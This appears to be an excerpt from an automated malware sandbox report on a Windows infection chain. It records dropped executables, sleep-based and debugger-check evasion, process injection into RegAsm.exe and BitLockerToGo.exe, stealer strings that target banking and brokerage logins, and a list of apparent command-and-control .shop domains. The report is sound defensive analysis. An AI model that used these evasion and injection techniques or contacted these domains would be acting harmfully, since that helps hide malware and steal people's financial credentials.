Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-86R9G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-5ANFC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-IVTOI.tmp
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Y-Cleaner.exe
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1]
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\libssl-1_1.dll (copy)
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1]
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe API coverage: 9.4 %
Source: C:\Users\user\Desktop\file.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe TID: 6988 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe TID: 8060 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe TID: 3348 Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe TID: 3348 Thread sleep time: -3360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892 Thread sleep count: 1186 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892 Thread sleep count: 318 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1864 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 604 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3124 Thread sleep count: 651 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 316 Thread sleep count: 92 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3240 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5812 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File opened: PhysicalDrive0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00540A25 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_00540A25
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0040553A FindFirstFileA, 8_2_0040553A
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, 8_2_004055DE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041E01D FindFirstFileExW, 9_2_0041E01D
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10007EA9 FindFirstFileExW, 9_2_10007EA9
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DE284 FindFirstFileExW, 9_2_020DE284
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00452A4C FindFirstFileA,GetLastError, 11_2_00452A4C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004751F8 FindFirstFileA,FindNextFileA,FindClose, 11_2_004751F8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_00464048
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_004644C4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00462ABC FindFirstFileA,FindNextFileA,FindClose, 11_2_00462ABC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 11_2_00497A74
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 7_2_00409B30
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe Binary or memory string: VMware
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000002.2339117587.000000000152E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(FX
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1691472183.0000000001574000.00000004.00000020.00020000.00000000.sdmp, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000002.2339117587.0000000001574000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000002.2679705676.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000002.2679705676.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000002.1779130970.00000000026B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002678000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp`
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW'0'
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000000.1571265793.00000000013E2000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_movevisaSpellingProtectSpeechReadyForiTop PDFCiscoSparkLauncherWebExCiscoSparkdotnetEvent ViewerF12BlendBaiduHP_Easy_StartSmartSteamEmuBrowserCacheseeedwodlholdhodlSketchUpbandlab-assistantvlcPixelSeeCLR_v4.0CLR_v2.0_32webCachesHoYoversepocopedaTwitch StudioWebTorrentLibrarymopnmbcafieddcagagdcbnhejhlodfddbhhhlbepdkbapadjdnnojkbgioiodbicopcgpfmipidbgpenhmajoajpbobppdilnngceckbapebfimnlniiiahkandclblbVsGraphicsWindowsAppsvshubWindows Sidebaroptimization_guide_prediction_model_downloadsUXP.android.cache.gradleVALORANTNichromeMetroOpenOfficeVodafoneClickUpDATAparkXiaomiDevice MetadataWindows Live ContactsWindows StorecacheCommsConnectedDevicesPlatformaddonscachesLocal StorageAugLoopMcAfee_Inclinknowmt-center.chiadaoexporttokenWorldOfTanksWargaming.netPlay GamesAutoItVirtualBoxreposiCloudDriveVMwareFree_PDF_SolutionsLenovoServiceBridgeMega LimitedMEGAsyncLogiShrd@
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763288306.00000000010ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.0000000000588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: main.YFHiCIiixcqEmuOlForkRgsVMgLNXhAujTFmOcP
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: main.xVFDfAARqjMemLyUDOzhCyJqReWzzAWruHqqEmUwOjMGu
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018FC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ymECWhxYrkkpjnZlrjPDSzJkDiTLdWCcvWIdBkmFQkjZElBIRukKygZKZdJqigldpvMCicgGyjGEvQVcW
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749833727.00000000036C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information queried: ProcessInformation
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00553DC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00553DC0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 9_2_00402940
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_00418320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00432FE0 mov eax, dword ptr fs:[00000030h] 3_2_00432FE0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041487F mov eax, dword ptr fs:[00000030h] 9_2_0041487F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041B509 mov eax, dword ptr fs:[00000030h] 9_2_0041B509
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10007A76 mov eax, dword ptr fs:[00000030h] 9_2_10007A76
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10005F25 mov eax, dword ptr fs:[00000030h] 9_2_10005F25
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004B27AC push dword ptr fs:[00000030h] 9_2_004B27AC
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D4AE6 mov eax, dword ptr fs:[00000030h] 9_2_020D4AE6
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C092B mov eax, dword ptr fs:[00000030h] 9_2_020C092B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DB770 mov eax, dword ptr fs:[00000030h] 9_2_020DB770
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C0D90 mov eax, dword ptr fs:[00000030h] 9_2_020C0D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0050CDF0 lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA, 3_2_0050CDF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0053FB45 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0053FB45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00553DC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00553DC0
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0041584A SetUnhandledExceptionFilter, 8_2_0041584A
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0041585C SetUnhandledExceptionFilter, 8_2_0041585C
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040C986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040C986
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040D3A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_0040D3A5
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00410D6B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00410D6B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040D539 SetUnhandledExceptionFilter, 9_2_0040D539
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10002ADF
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_100056A0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_10002FDA
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CCBED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_020CCBED
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CD60C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_020CD60C
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CD7A0 SetUnhandledExceptionFilter, 9_2_020CD7A0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D0FD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_020D0FD2
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 260000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03022129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_03022129
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 260000 value starts with: 4D5A
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: reinforcenh.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stogeneratmns.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fragnantbui.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: drawzhotdog.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: vozmeatillu.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: offensivedzvju.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: ghostreedmnu.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: gutterydhowi.shop
